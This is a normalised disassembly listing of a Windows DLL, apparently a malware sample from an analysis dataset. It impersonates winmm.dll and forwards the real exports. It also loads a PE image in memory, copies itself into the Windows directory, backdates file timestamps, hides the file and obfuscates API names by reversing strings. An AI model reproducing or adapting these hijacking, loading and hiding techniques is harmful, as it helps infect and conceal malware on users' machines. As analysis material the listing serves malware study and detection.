sub_10001050
push ecx
push esi
push edi
push rw-data
call sub_10001000
add esp 0x4
push rw-data
push eax
call [ GetProcAddress@IAT ]
push 0x0
mov [ rw-data ] eax
mov [ esp + 0xc ] 0x0
call [ CoInitialize@IAT ]
mov eax [ esp + 0x10 ]
push eax
call sub_10001020
mov ecx [ esp + 0x18 ]
mov edi eax
push ecx
call sub_10001020
mov esi eax
add esp 0x8
test esi esi
je r-xdata
test edi edi
je r-xdata
lea edx [ esp + 0x8 ]
push edx
push r--data
push 0x1
push 0x0
push r--data
call [ CoCreateInstance@IAT ]
mov eax [ esp + 0x8 ]
test eax eax
je r-xdata
mov eax [ esp + 0x8 ]
pop edi
test eax eax
pop esi
je r-xdata
mov eax [ edi ]
push edi
call [ eax + 0x8 ]
mov edx [ esi ]
push esi
call [ edx + 0x8 ]
mov ecx [ eax ]
push 0x10840014
push eax
call [ ecx + 0x14 ]
mov eax [ esp + 0x8 ]
push 0x0
push rw-data
push esi
mov edx [ eax ]
push edi
push eax
call [ edx + 0x40 ]
mov eax [ esp + 0x8 ]
push eax
mov ecx [ eax ]
call [ ecx + 0x54 ]
call [ CoUninitialize@IAT ]
pop ecx
retn
mov ecx [ eax ]
push eax
call [ ecx + 0x8 ]
sub_10001120
push ecx
push ebx
push ebp
push esi
mov esi [ esp + 0x14 ]
mov ebp [ VirtualAlloc@IAT ]
push edi
mov ebx [ esi + 0x3c ]
push 0x4
add ebx esi
push 0x2000
mov eax [ ebx + 0x50 ]
mov ecx [ ebx + 0x34 ]
push eax
push ecx
call ebp
mov edi eax
test edi edi
mov [ esp + 0x10 ] edi
jne r-xdata
push 0x14
push 0x0
call [ GetProcessHeap@IAT ]
push eax
call [ HeapAlloc@IAT ]
mov ebp eax
xor eax eax
push 0x4
push 0x1000
mov [ ebp + 0x4 ] edi
mov [ ebp + 0xc ] eax
mov [ ebp + 0x8 ] eax
mov [ ebp + 0x10 ] eax
mov eax [ ebx + 0x50 ]
push eax
push edi
call [ VirtualAlloc@IAT ]
mov ecx [ ebx + 0x54 ]
push 0x4
push 0x1000
push ecx
push edi
call [ VirtualAlloc@IAT ]
mov ecx [ ebx + 0x54 ]
mov edi [ esi + 0x3c ]
add ecx edi
mov edi eax
mov edx ecx
push ebp
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
push ebx
and ecx 0x3
[ edi ] [ esi ]
mov ecx [ esp + 0x20 ]
mov esi [ esp + 0x18 ]
push ecx
mov edx [ ecx + 0x3c ]
add eax edx
mov [ ebp ] eax
mov [ eax + 0x34 ] esi
call sub_10001250
mov ecx [ ebx + 0x34 ]
mov eax esi
add esp 0xc
sub eax ecx
je r-xdata
mov edx [ ebx + 0x50 ]
push 0x4
push 0x2000
push edx
push eax
call ebp
test eax eax
mov [ esp + 0x10 ] eax
jne r-xdata
push ebp
call sub_10001480
add esp 0x4
test eax eax
je r-xdata
push eax
push ebp
call sub_10001400
add esp 0x8
mov edi [ esp + 0x10 ]
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
push ebp
call sub_10001640
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
push ebp
call sub_10001340
mov eax [ ebp ]
add esp 0x4
mov eax [ eax + 0x28 ]
test eax eax
je r-xdata
pop edi
mov eax ebp
pop esi
pop ebp
pop ebx
pop ecx
retn
add eax esi
test eax eax
je r-xdata
push 0x0
push 0x1
push esi
call eax
test eax eax
jne r-xdata
mov [ ebp + 0x10 ] 0x1
sub_10001250
sub esp 0x8
mov eax [ esp + 0x14 ]
push ebx
push ebp
xor ecx ecx
mov ebp [ eax + 0x4 ]
mov eax [ eax ]
mov [ esp + 0x8 ] 0x0
mov cx [ eax + 0x14 ]
cmp [ eax + 0x6 ] 0x0
lea ebx [ ecx + eax + 0x18 ]
jbe r-xdata
pop ebp
pop ebx
add esp 0x8
retn
push esi
push edi
mov ecx [ ebx + 0xc ]
mov eax [ ebx + 0x10 ]
push 0x4
push 0x1000
add ecx ebp
push eax
push ecx
call [ VirtualAlloc@IAT ]
mov ecx [ rw-data ]
mov esi [ ebx + 0x14 ]
mov edi [ esp + 0x1c ]
mov edx ecx
add esi edi
mov edi eax
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
mov [ ebx + 0x8 ] eax
mov eax [ esp + 0x20 ]
mov esi [ eax + 0x38 ]
test esi esi
jle r-xdata
lea edx [ esp + 0x14 ]
push edx
push rw-data
push 0x1000
call [ RegOpenKeyA@IAT ]
sub eax 0x5
mov eax [ ebx + eax * 4 + 0xc ]
test eax eax
mov [ rw-data ] eax
jne r-xdata
pop edi
pop esi
mov ecx [ esp + 0x24 ]
mov eax [ esp + 0x10 ]
inc eax
add ebx 0x28
mov edx [ ecx ]
xor ecx ecx
mov [ esp + 0x10 ] eax
mov cx [ edx + 0x6 ]
cmp eax ecx
jl r-xdata
mov ecx [ ebx + 0xc ]
push 0x4
push 0x1000
add ecx ebp
push esi
push ecx
call [ VirtualAlloc@IAT ]
mov ecx esi
mov edi eax
mov edx ecx
xor eax eax
shr ecx 0x2
mov [ ebx + 0x8 ] edi
[ edi ]
mov ecx edx
and ecx 0x3
[ edi ]
jmp r-xdata
sub_10001340
push ecx
mov eax [ esp + 0x8 ]
push ebx
xor ecx ecx
push ebp
mov ebx [ eax ]
xor ebp ebp
mov cx [ ebx + 0x14 ]
cmp [ ebx + 0x6 ] bp
lea eax [ ecx + ebx + 0x18 ]
jbe r-xdata
pop ebp
pop ebx
pop ecx
retn
push esi
push edi
lea edi [ eax + 0x24 ]
lea ecx [ edx + ecx * 2 ]
test eax 0x4000000
lea edx [ esi + ecx * 2 ]
mov esi [ edx * 4 + rw-data ]
je r-xdata
mov edx [ edi - 0x14 ]
mov eax [ edi - 0x1c ]
push 0x4000
push edx
push eax
call [ VirtualFree@IAT ]
jmp r-xdata
mov edx [ edi - 0x14 ]
mov ecx edx
test ecx ecx
jne r-xdata
or esi 0x200
mov edx [ esp + 0x18 ]
xor eax eax
inc ebp
add edi 0x28
mov ebx [ edx ]
mov ax [ ebx + 0x6 ]
cmp ebp eax
jl r-xdata
jbe r-xdata
test al 0x40
je r-xdata
mov eax [ edi ]
mov ecx eax
mov edx eax
shr ecx 0x1d
shr edx 0x1e
mov esi eax
and ecx 0x1
and edx 0x1
shr esi 0x1f
test eax 0x2000000
je r-xdata
pop edi
pop esi
mov ecx [ edi - 0x1c ]
lea eax [ esp + 0x10 ]
push eax
push esi
push edx
push ecx
call [ VirtualProtect@IAT ]
test al 0x80
je r-xdata
mov ecx [ ebx + 0x20 ]
jmp r-xdata
mov ecx [ ebx + 0x24 ]
test ecx ecx
sub_10001400
mov eax [ esp + 0x4 ]
push ebx
mov ebx [ eax + 0x4 ]
mov eax [ eax ]
add eax 0xa0
mov ecx [ eax + 0x4 ]
test ecx ecx
jbe r-xdata
pop ebx
retn
mov ecx [ eax ]
mov eax [ ecx + ebx ]
add ecx ebx
test eax eax
jbe r-xdata
push ebp
push esi
push edi
add ecx [ ecx + 0x4 ]
mov eax [ ecx ]
test eax eax
ja r-xdata
xor eax eax
mov ax [ edx ]
mov ebp eax
and ebp 0xfffff000
cmp ebp 0x3000
jne r-xdata
lea edi [ eax + ebx ]
mov eax [ ecx + 0x4 ]
sub eax 0x8
xor esi esi
test eax 0xfffffffe
lea edx [ ecx + 0x8 ]
jbe r-xdata
pop edi
pop esi
pop ebp
mov eax [ ecx + 0x4 ]
inc esi
sub eax 0x8
add edx 0x2
shr eax 0x1
cmp esi eax
jb r-xdata
mov ebp [ esp + 0x18 ]
and eax 0xfff
add eax edi
add [ eax ] ebp
sub_10001480
push ecx
push ebx
push ebp
push esi
push edi
mov edi [ esp + 0x18 ]
mov ebx 0x1
mov eax [ edi ]
mov ebp [ edi + 0x4 ]
add eax 0x80
mov ecx [ eax + 0x4 ]
test ecx ecx
jbe r-xdata
pop edi
pop esi
mov eax ebx
pop ebp
pop ebx
pop ecx
retn
mov esi [ eax ]
push 0x14
add esi ebp
push esi
mov [ esp + 0x18 ] esi
call [ IsBadReadPtr@IAT ]
test eax eax
jne r-xdata
mov eax [ esi + 0xc ]
test eax eax
je r-xdata
pop edi
pop esi
pop ebp
mov eax 0x1
pop ebx
pop ecx
retn
add eax ebp
push eax
call [ LoadLibraryA@IAT ]
mov ebx eax
cmp ebx 0xffffffff
je r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
pop ecx
retn
mov eax [ edi + 0xc ]
mov edx [ edi + 0x8 ]
lea ecx [ eax * 4 + 0x4 ]
push ecx
push edx
call [ realloc@IAT ]
add esp 0x8
mov [ edi + 0x8 ] eax
test eax eax
je r-xdata
mov ecx [ edi + 0xc ]
mov [ eax + ecx * 4 ] ebx
mov edx [ edi + 0xc ]
inc edx
mov [ edi + 0xc ] edx
mov eax [ esi ]
test eax eax
je r-xdata
mov edx [ esi + 0x10 ]
lea edi [ edx + ebp ]
mov esi edi
mov esi [ esi + 0x10 ]
lea edi [ eax + ebp ]
add esi ebp
jmp r-xdata
mov eax [ esp + 0x10 ]
push 0x14
add eax 0x14
push eax
mov [ esp + 0x18 ] eax
call [ IsBadReadPtr@IAT ]
test eax eax
jne r-xdata
test eax 0x80000000
je r-xdata
mov eax [ edi ]
test eax eax
je r-xdata
mov edi [ esp + 0x18 ]
mov esi [ esp + 0x10 ]
jmp r-xdata
lea eax [ eax + ebp + 0x2 ]
and eax 0xffff
jmp r-xdata
mov eax [ edi + 0x4 ]
add edi 0x4
add esi 0x4
test eax eax
jne r-xdata
push eax
push ebx
call [ GetProcAddress@IAT ]
test eax eax
mov [ esi ] eax
je r-xdata
sub_100015a0
mov eax [ esp + 0x4 ]
push ebx
push ebp
push esi
mov ebp [ eax + 0x4 ]
mov eax [ eax ]
add eax 0x78
push edi
mov ecx [ eax + 0x4 ]
test ecx ecx
je r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
retn
mov esi [ eax ]
mov eax [ esi + ebp + 0x18 ]
add esi ebp
test eax eax
je r-xdata
mov ecx [ esi + 0x14 ]
test ecx ecx
je r-xdata
mov edi [ esi + 0x20 ]
mov ebx [ esi + 0x24 ]
add edi ebp
add ebx ebp
test eax eax
mov [ esp + 0x14 ] 0x0
jbe r-xdata
mov eax [ edi ]
mov ecx [ esp + 0x18 ]
add eax ebp
push eax
push ecx
call [ _stricmp@IAT ]
add esp 0x8
test eax eax
je r-xdata
xor eax eax
mov ax [ ebx ]
cmp eax 0xffffffff
je r-xdata
mov eax [ esp + 0x14 ]
mov ecx [ esi + 0x18 ]
inc eax
add edi 0x4
add ebx 0x2
cmp eax ecx
mov [ esp + 0x14 ] eax
jb r-xdata
cmp eax [ esi + 0x14 ]
ja r-xdata
mov edx [ esi + 0x1c ]
pop edi
pop esi
lea eax [ edx + eax * 4 ]
mov eax [ eax + ebp ]
add eax ebp
pop ebp
pop ebx
retn
sub_10001640
push esi
mov esi [ esp + 0x8 ]
test esi esi
je r-xdata
pop esi
retn
mov eax [ esi + 0x10 ]
test eax eax
je r-xdata
mov eax [ esi + 0x8 ]
test eax eax
je r-xdata
mov ecx [ esi ]
mov eax [ esi + 0x4 ]
push 0x0
push 0x0
mov edx [ ecx + 0x28 ]
push eax
add edx eax
call edx
mov [ esi + 0x10 ] 0x0
mov eax [ esi + 0x4 ]
test eax eax
je r-xdata
mov eax [ esi + 0xc ]
push edi
xor edi edi
test eax eax
jle r-xdata
push esi
push 0x0
call [ GetProcessHeap@IAT ]
push eax
call [ HeapFree@IAT ]
push 0x8000
push 0x0
push eax
call [ VirtualFree@IAT ]
mov ecx [ esi + 0x8 ]
push ecx
call [ free@IAT ]
add esp 0x4
pop edi
push ebx
mov ebx [ FreeLibrary@IAT ]
mov eax [ esi + 0xc ]
inc edi
cmp edi eax
jl r-xdata
push eax
call ebx
mov eax [ esi + 0x8 ]
mov eax [ eax + edi * 4 ]
cmp eax 0xffffffff
je r-xdata
pop ebx
sub_100016f0
sub esp 0x338
push esi
push edi
call sub_100016d0
mov ecx 0xcd
xor eax eax
lea edi [ esp + 0x9 ]
mov esi rw-data
[ edi ]
stosw [ edi ]
stosb [ edi ]
mov ecx 0x4b
lea edi [ esp + 0x8 ]
[ edi ] [ esi ]
mov ecx [ rw-data ]
lea eax [ esp + 0x208 ]
push 0x12c
push eax
push ecx
call [ GetModuleFileNameA@IAT ]
mov ecx [ rw-data ]
mov edx [ esp + 0x670 ]
mov eax [ esp + 0x674 ]
push ecx
mov [ esp + 0x338 ] edx
mov [ esp + 0x33c ] eax
call sub_10001120
add esp 0x4
test eax eax
je r-xdata
pop edi
xor eax eax
pop esi
add esp 0x338
retn
push rw-data
push eax
call sub_100015a0
add esp 0x8
test eax eax
je r-xdata
sub esp 0x338
mov ecx 0xce
lea esi [ esp + 0x340 ]
mov edi esp
[ edi ] [ esi ]
call eax
pop edi
pop esi
add esp 0x338
retn
sub_100017d0
sub esp 0x164
push ebx
push ebp
mov ebp [ esp + 0x170 ]
push esi
push edi
push 0x80
push ebp
call [ SetFileAttributesA@IAT ]
xor eax eax
xor ebx ebx
mov [ esp + 0x28 ] eax
mov ecx 0x4a
mov [ esp + 0x2c ] eax
lea edi [ esp + 0x49 ]
mov [ esp + 0x30 ] eax
mov [ esp + 0x48 ] bl
mov [ esp + 0x34 ] eax
push 0x12c
[ edi ]
stosw [ edi ]
lea ecx [ esp + 0x4c ]
push ecx
stosb [ edi ]
call [ GetSystemDirectoryA@IAT ]
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x48 ]
[ edi ]
not ecx
sub edi ecx
push ebx
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
push 0x80
and ecx 0x3
push 0x3
push ebx
push 0x1
[ edi ] [ esi ]
mov edi [ CreateFileA@IAT ]
lea eax [ esp + 0x5c ]
push 0x80000000
push eax
mov [ esp + 0x34 ] ebx
mov [ esp + 0x38 ] ebx
mov [ esp + 0x3c ] ebx
mov [ esp + 0x40 ] ebx
mov [ esp + 0x2c ] ebx
mov [ esp + 0x30 ] ebx
call edi
mov esi eax
cmp esi ebx
je r-xdata
lea ecx [ esp + 0x40 ]
lea edx [ esp + 0x28 ]
push ecx
push edx
mov [ esp + 0x30 ] 0x7d4
mov [ esp + 0x32 ] 0x8
mov [ esp + 0x36 ] 0x11
mov [ esp + 0x38 ] 0x14
mov [ esp + 0x3a ] bx
call [ SystemTimeToFileTime@IAT ]
lea eax [ esp + 0x38 ]
lea ecx [ esp + 0x40 ]
push eax
push ecx
call [ LocalFileTimeToFileTime@IAT ]
mov eax [ esp + 0x38 ]
mov ecx [ esp + 0x3c ]
mov [ esp + 0x18 ] eax
mov [ esp + 0x1c ] ecx
mov [ esp + 0x10 ] eax
mov [ esp + 0x14 ] ecx
mov [ esp + 0x20 ] eax
mov [ esp + 0x24 ] ecx
lea ecx [ esp + 0x20 ]
lea edx [ esp + 0x10 ]
push ecx
lea eax [ esp + 0x1c ]
push edx
push eax
push esi
call [ GetFileTime@IAT ]
push esi
call [ CloseHandle@IAT ]
jmp r-xdata
push 0x7
push ebp
call [ SetFileAttributesA@IAT ]
pop edi
pop esi
pop ebp
pop ebx
add esp 0x164
retn
lea edx [ esp + 0x20 ]
lea eax [ esp + 0x10 ]
push edx
lea ecx [ esp + 0x1c ]
push eax
push ecx
push esi
call [ SetFileTime@IAT ]
push esi
call [ CloseHandle@IAT ]
push ebx
push 0x80
push 0x3
push ebx
push 0x2
push 0x40000000
push ebp
call edi
mov esi eax
cmp esi ebx
je r-xdata
sub_10001960
mov eax [ rw-data ]
sub esp 0x104
test eax eax
jne r-xdata
mov ecx [ esp + 0x108 ]
push ecx
push eax
call [ GetProcAddress@IAT ]
test eax eax
jne r-xdata
lea eax [ esp ]
push 0x104
push eax
call [ GetSystemDirectoryA@IAT ]
lea ecx [ esp ]
push rw-data
push ecx
call [ lstrcatA@IAT ]
lea edx [ esp ]
push edx
call [ LoadLibraryA@IAT ]
test eax eax
mov [ rw-data ] eax
jne r-xdata
add esp 0x104
retn 0x4
push 0xfffffffe
call [ ExitProcess@IAT ]
push 0xffffffff
call [ ExitProcess@IAT ]
sub_100019d0
push ebp
mov ebp esp
sub esp 0xd88
push ebx
push esi
push edi
xor ebx ebx
mov ecx 0x4a
xor eax eax
lea edi [ ebp - 0x2bb ]
mov [ ebp - 0x2bc ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp - 0x2bc ]
push 0x12b
push eax
push ebx
call [ GetModuleFileNameA@IAT ]
lea ecx [ ebp - 0x2bc ]
push ecx
call [ _strlwr@IAT ]
mov eax [ ebp + 0xc ]
mov ecx 0x1
add esp 0x4
cmp eax ecx
je r-xdata
cmp [ rw-data ] ecx
jne r-xdata
cmp eax 0x2
jne r-xdata
mov [ rw-data ] ecx
mov ecx 0xcd
xor eax eax
lea edi [ ebp - 0xd87 ]
mov [ ebp - 0xd88 ] bl
mov esi [ ebp + 0x8 ]
[ edi ]
stosw [ edi ]
mov [ rw-data ] esi
mov [ ebp + 0xc ] ebx
stosb [ edi ]
mov [ ebp + 0xc ] ebp
mov edx [ ebp + 0xc ]
mov ecx 0x4a
lea edi [ ebp - 0x3e7 ]
push 0x12b
mov eax [ edx ]
mov eax [ eax + 0x4 ]
mov [ ebp - 0x3e8 ] bl
mov [ ebp - 0xa58 ] eax
xor eax eax
[ edi ]
stosw [ edi ]
lea ecx [ ebp - 0x3e8 ]
push ecx
push esi
stosb [ edi ]
call [ GetModuleFileNameA@IAT ]
mov ecx 0x4a
xor eax eax
lea edi [ ebp - 0x63f ]
mov [ ebp - 0x640 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
mov ecx 0x4a
xor eax eax
lea edi [ ebp - 0x513 ]
mov [ ebp - 0x514 ] bl
[ edi ]
stosw [ edi ]
lea edx [ ebp - 0x514 ]
push 0x12c
push edx
stosb [ edi ]
call [ GetWindowsDirectoryA@IAT ]
lea eax [ ebp - 0x514 ]
lea ecx [ ebp - 0x640 ]
push eax
push rw-data
push 0x12b
push ecx
call [ _snprintf@IAT ]
mov edi [ strstr@IAT ]
lea edx [ ebp - 0x2bc ]
push rw-data
push edx
call edi
add esp 0x18
test eax eax
je r-xdata
mov eax ecx
pop edi
pop esi
pop ebx
mov esp ebp
pop ebp
retn 0xc
pop edi
pop esi
mov eax 0x1
pop ebx
mov esp ebp
pop ebp
retn 0xc
lea ecx [ ebp - 0x2bc ]
push rw-data
push ecx
call edi
add esp 0x8
test eax eax
je r-xdata
lea eax [ ebp - 0x640 ]
lea ecx [ ebp - 0x3e8 ]
push eax
push ecx
call [ _stricmp@IAT ]
add esp 0x8
test eax eax
je r-xdata
sub esp 0x338
mov ecx 0xce
lea esi [ ebp - 0xd88 ]
mov edi esp
mov [ ebp - 0xa5c ] 0x1
[ edi ] [ esi ]
call sub_100016f0
mov eax [ ebp + 0x8 ]
add esp 0x338
push eax
call [ DisableThreadLibraryCalls@IAT ]
mov ecx 0x4a
xor eax eax
lea edi [ ebp - 0x973 ]
mov [ ebp - 0x974 ] bl
[ edi ]
stosw [ edi ]
lea edx [ ebp - 0x974 ]
push 0x12b
push edx
push esi
stosb [ edi ]
call [ GetModuleFileNameA@IAT ]
mov ecx 0x4a
xor eax eax
lea edi [ ebp - 0x18f ]
mov [ ebp - 0x190 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp - 0x190 ]
push 0x12c
push eax
call [ GetWindowsDirectoryA@IAT ]
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ ebp - 0x190 ]
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea eax [ ebp - 0x190 ]
and ecx 0x3
push eax
[ edi ] [ esi ]
call sub_100017b0
lea ecx [ ebp - 0x190 ]
push ecx
call sub_10002cd0
add esp 0x8
test eax eax
je r-xdata
mov ecx 0x81
xor eax eax
lea edi [ ebp - 0xa4e ]
mov [ ebp - 0xa50 ] bx
[ edi ]
lea edx [ ebp - 0xa50 ]
push 0x103
push edx
push esi
stosw [ edi ]
call [ GetModuleFileNameW@IAT ]
mov ecx 0xe
mov esi rw-data
lea edi [ ebp - 0x848 ]
xor eax eax
[ edi ] [ esi ]
mov esi [ _wcsrev@IAT ]
mov ecx 0x74
lea edi [ ebp - 0x810 ]
[ edi ]
lea eax [ ebp - 0x848 ]
push eax
call esi
lea ecx [ ebp - 0xa50 ]
push eax
push ecx
call sub_10001050
mov ecx 0xf
xor eax eax
lea edi [ ebp - 0x4c ]
push rw-data
[ edi ]
mov [ ebp - 0x4c ] 0x3c
mov [ ebp - 0x48 ] 0x40
call esi
mov ecx [ rw-data ]
mov edx [ rw-data ]
mov [ ebp - 0x3c ] eax
mov eax rw-data
mov [ ebp - 0x38 ] eax
mov [ ebp - 0x34 ] eax
mov eax [ rw-data ]
mov [ ebp - 0x8 ] ecx
mov [ ebp - 0xc ] eax
mov [ ebp - 0x10 ] edx
mov edx [ rw-data ]
mov ecx 0x6
mov esi rw-data
lea edi [ ebp - 0x64 ]
lea eax [ ebp - 0x64 ]
mov [ ebp - 0x30 ] 0x5
[ edi ] [ esi ]
push eax
mov [ ebp - 0x4 ] edx
call [ _wcsrev@IAT ]
add esp 0x14
push eax
call [ LoadLibraryW@IAT ]
lea ecx [ ebp - 0x10 ]
mov esi eax
push ecx
call [ _strrev@IAT ]
add esp 0x4
push eax
push esi
call [ GetProcAddress@IAT ]
lea edx [ ebp - 0x4c ]
push edx
call eax
test eax eax
je r-xdata
lea eax [ ebp - 0x190 ]
push 0x1
lea ecx [ ebp - 0x974 ]
push eax
push ecx
call [ CopyFileA@IAT ]
lea edx [ ebp - 0x190 ]
push edx
call sub_100017d0
sub esp 0x334
mov ecx 0xce
lea esi [ ebp - 0xd88 ]
mov edi esp
mov [ ebp - 0xa5c ] 0x3
[ edi ] [ esi ]
call sub_100016f0
add esp 0x338
push 0x1
call [ ExitProcess@IAT ]
mov ecx 0x4a
xor eax eax
lea edi [ ebp - 0x76b ]
mov [ ebp - 0x76c ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea edx [ ebp - 0x190 ]
push 0x12c
lea eax [ ebp - 0x76c ]
push edx
push eax
call [ strncpy@IAT ]
lea ecx [ ebp - 0x76c ]
push 0x5c
push ecx
call [ strrchr@IAT ]
mov [ eax + 0x1 ] bl
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
lea edx [ ebp - 0x76c ]
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea eax [ ebp - 0x76c ]
and ecx 0x3
push eax
[ edi ] [ esi ]
call sub_100017b0
lea ecx [ ebp - 0x76c ]
lea edx [ ebp - 0x190 ]
push ecx
push edx
call [ rename@IAT ]
add esp 0x20
xor eax eax
pop edi
pop esi
pop ebx
mov esp ebp
pop ebp
retn 0xc
mov eax [ ebp - 0x14 ]
cmp eax ebx
je r-xdata
push 0xffffffff
push eax
call [ WaitForSingleObject@IAT ]
mov eax [ ebp - 0x14 ]
push eax
call [ CloseHandle@IAT ]
sub_10002b7c
mov eax [ esp + 0x8 ]
test eax eax
jne r-xdata
mov ecx [ _adjust_fdiv@IAT ]
cmp eax 0x1
mov ecx [ ecx ]
mov [ rw-data ] ecx
jne r-xdata
cmp [ rw-data ] eax
jle r-xdata
test eax eax
jne r-xdata
push 0x80
call [ malloc@IAT ]
test eax eax
pop ecx
mov [ rw-data ] eax
jne r-xdata
xor eax eax
jmp r-xdata
dec [ rw-data ]
push 0x1
pop eax
mov eax [ rw-data ]
test eax eax
je r-xdata
and [ eax ] 0x0
mov eax [ rw-data ]
push rw-data
push rw-data
mov [ rw-data ] eax
call _initterm
inc [ rw-data ]
pop ecx
pop ecx
jmp r-xdata
retn 0xc
mov ecx [ rw-data ]
push esi
lea esi [ ecx - 0x4 ]
push eax
call [ free@IAT ]
and [ rw-data ] 0x0
pop ecx
pop esi
mov ecx [ esi ]
test ecx ecx
je r-xdata
sub esi 0x4
jmp r-xdata
call ecx
mov eax [ rw-data ]
cmp esi eax
jb r-xdata
_start
push ebp
mov ebp esp
push ebx
mov ebx [ ebp + 0x8 ]
push esi
mov esi [ ebp + 0xc ]
push edi
mov edi [ ebp + 0x10 ]
test esi esi
jne r-xdata
cmp esi 0x1
je r-xdata
cmp [ rw-data ] 0x0
jmp r-xdata
mov eax [ rw-data ]
test eax eax
je r-xdata
cmp esi 0x2
jne r-xdata
jne r-xdata
push edi
push esi
push ebx
call sub_10002b7c
test eax eax
push edi
push esi
push ebx
call eax
test eax eax
je r-xdata
push edi
push esi
push ebx
call sub_100019d0
cmp esi 0x1
mov [ ebp + 0xc ] eax
jne r-xdata
xor eax eax
jmp r-xdata
test esi esi
je r-xdata
test eax eax
jne r-xdata
pop edi
pop esi
pop ebx
pop ebp
retn 0xc
push edi
push esi
push ebx
call sub_10002b7c
test eax eax
jne r-xdata
cmp esi 0x3
jne r-xdata
mov eax [ ebp + 0xc ]
push edi
push eax
push ebx
call sub_10002b7c
cmp [ ebp + 0xc ] 0x0
je r-xdata
and [ ebp + 0xc ] eax
mov eax [ rw-data ]
test eax eax
je r-xdata
push edi
push esi
push ebx
call eax
mov [ ebp + 0xc ] eax
sub_10002cf0
push ecx
cmp eax 0x1000
lea ecx [ esp + 0x8 ]
jb r-xdata
sub ecx eax
mov eax esp
test [ ecx ] eax
mov esp ecx
mov ecx [ eax ]
mov eax [ eax + 0x4 ]
push eax
retn
sub ecx 0x1000
sub eax 0x1000
test [ ecx ] eax
cmp eax 0x1000
jae r-xdata
sub_10001000
push esi
mov esi [ esp + 0x8 ]
push esi
call [ GetModuleHandleA@IAT ]
test eax eax
jne r-xdata
pop esi
retn
push esi
call [ LoadLibraryA@IAT ]
sub_100016d0
mov eax [ rw-data ]
test eax eax
jne r-xdata
retn
mov [ rw-data ] rw-data
mov [ rw-data ] 0x25000
ordinal_2
push 0x2
call sub_10001960
jmp eax
CloseDriver
push rw-data
call sub_10001960
jmp eax
DefDriverProc
push rw-data
call sub_10001960
jmp eax
DriverCallback
push rw-data
call sub_10001960
jmp eax
DrvGetModuleHandle
push rw-data
call sub_10001960
jmp eax
GetDriverModuleHandle
push rw-data
call sub_10001960
jmp eax
MigrateAllDrivers
push rw-data
call sub_10001960
jmp eax
MigrateSoundEvents
push rw-data
call sub_10001960
jmp eax
NotifyCallbackData
push rw-data
call sub_10001960
jmp eax
OpenDriver
push rw-data
call sub_10001960
jmp eax
PlaySound
push rw-data
call sub_10001960
jmp eax
PlaySoundA
push rw-data
call sub_10001960
jmp eax
PlaySoundW
push rw-data
call sub_10001960
jmp eax
SendDriverMessage
push rw-data
call sub_10001960
jmp eax
WOW32DriverCallback
push rw-data
call sub_10001960
jmp eax
WOW32ResolveMultiMediaHandle
push rw-data
call sub_10001960
jmp eax
WOWAppExit
push rw-data
call sub_10001960
jmp eax
WinmmLogoff
push rw-data
call sub_10001960
jmp eax
WinmmLogon
push rw-data
call sub_10001960
jmp eax
aux32Message
push rw-data
call sub_10001960
jmp eax
auxGetDevCapsA
push rw-data
call sub_10001960
jmp eax
auxGetDevCapsW
push rw-data
call sub_10001960
jmp eax
auxGetNumDevs
push rw-data
call sub_10001960
jmp eax
auxGetVolume
push rw-data
call sub_10001960
jmp eax
auxOutMessage
push rw-data
call sub_10001960
jmp eax
auxSetVolume
push rw-data
call sub_10001960
jmp eax
gfxAddGfx
push rw-data
call sub_10001960
jmp eax
gfxBatchChange
push rw-data
call sub_10001960
jmp eax
gfxCreateGfxFactoriesList
push rw-data
call sub_10001960
jmp eax
gfxCreateZoneFactoriesList
push rw-data
call sub_10001960
jmp eax
gfxDestroyDeviceInterfaceList
push rw-data
call sub_10001960
jmp eax
gfxEnumerateGfxs
push rw-data
call sub_10001960
jmp eax
_gfxLogoff@0
push rw-data
call sub_10001960
jmp eax
_gfxLogon@4
push rw-data
call sub_10001960
jmp eax
gfxModifyGfx
push rw-data
call sub_10001960
jmp eax
gfxOpenGfx
push rw-data
call sub_10001960
jmp eax
gfxRemoveGfx
push rw-data
call sub_10001960
jmp eax
joy32Message
push rw-data
call sub_10001960
jmp eax
joyConfigChanged
push rw-data
call sub_10001960
jmp eax
joyGetDevCapsA
push rw-data
call sub_10001960
jmp eax
joyGetDevCapsW
push rw-data
call sub_10001960
jmp eax
joyGetNumDevs
push rw-data
call sub_10001960
jmp eax
joyGetPos
push rw-data
call sub_10001960
jmp eax
joyGetPosEx
push rw-data
call sub_10001960
jmp eax
joyGetThreshold
push rw-data
call sub_10001960
jmp eax
joyReleaseCapture
push rw-data
call sub_10001960
jmp eax
joySetCapture
push rw-data
call sub_10001960
jmp eax
joySetThreshold
push rw-data
call sub_10001960
jmp eax
mci32Message
push rw-data
call sub_10001960
jmp eax
mciDriverNotify
push rw-data
call sub_10001960
jmp eax
mciDriverYield
push rw-data
call sub_10001960
jmp eax
mciExecute
push rw-data
call sub_10001960
jmp eax
mciFreeCommandResource
push rw-data
call sub_10001960
jmp eax
mciGetCreatorTask
push rw-data
call sub_10001960
jmp eax
mciGetDeviceIDA
push rw-data
call sub_10001960
jmp eax
mciGetDeviceIDFromElementIDA
push rw-data
call sub_10001960
jmp eax
mciGetDeviceIDFromElementIDW
push rw-data
call sub_10001960
jmp eax
mciGetDeviceIDW
